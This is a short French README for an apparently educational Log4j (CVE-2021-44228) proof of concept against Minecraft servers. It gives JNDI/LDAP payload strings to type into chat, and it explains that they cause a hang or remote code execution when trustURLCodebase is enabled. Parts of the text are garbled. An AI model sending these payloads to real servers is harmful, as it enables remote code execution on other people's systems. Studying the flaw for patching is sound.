
Une preuve de concept éducative pour la vulnérabilité Log4j (CVE-2021-44228) dans Minecraft
Ce projet est uniquement à des fins éducatives.
Ceci est une preuve de concept de la RCE log4j adaptée de HyCraftHD.
Voici quelques liens pour la CVE-2021-44228 :
Ce bogue affecte presque toutes les versions de log4j2 et peut-être aussi log4j1. La version recommandée à utiliser est 2.15.0 qui corrige l'exploit.
${jndi:ldap://127.0.0.1/e} dans le chat. S'il y a un socket ouvert sur le port 389, log4j essaie de se connecter et bloque toute communication ultérieure jusqu'à un délai d'attente.THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT! qui est un objet chaîne sérialisé provenant du serveur LDAP.
${jndi:ldap://127.0.0.1/exe} dans le chat. Si -Dcom.sun.jndi.ldap.object.trustURLCodebase=true est défini sur true, l'exécution de code à distance se produira.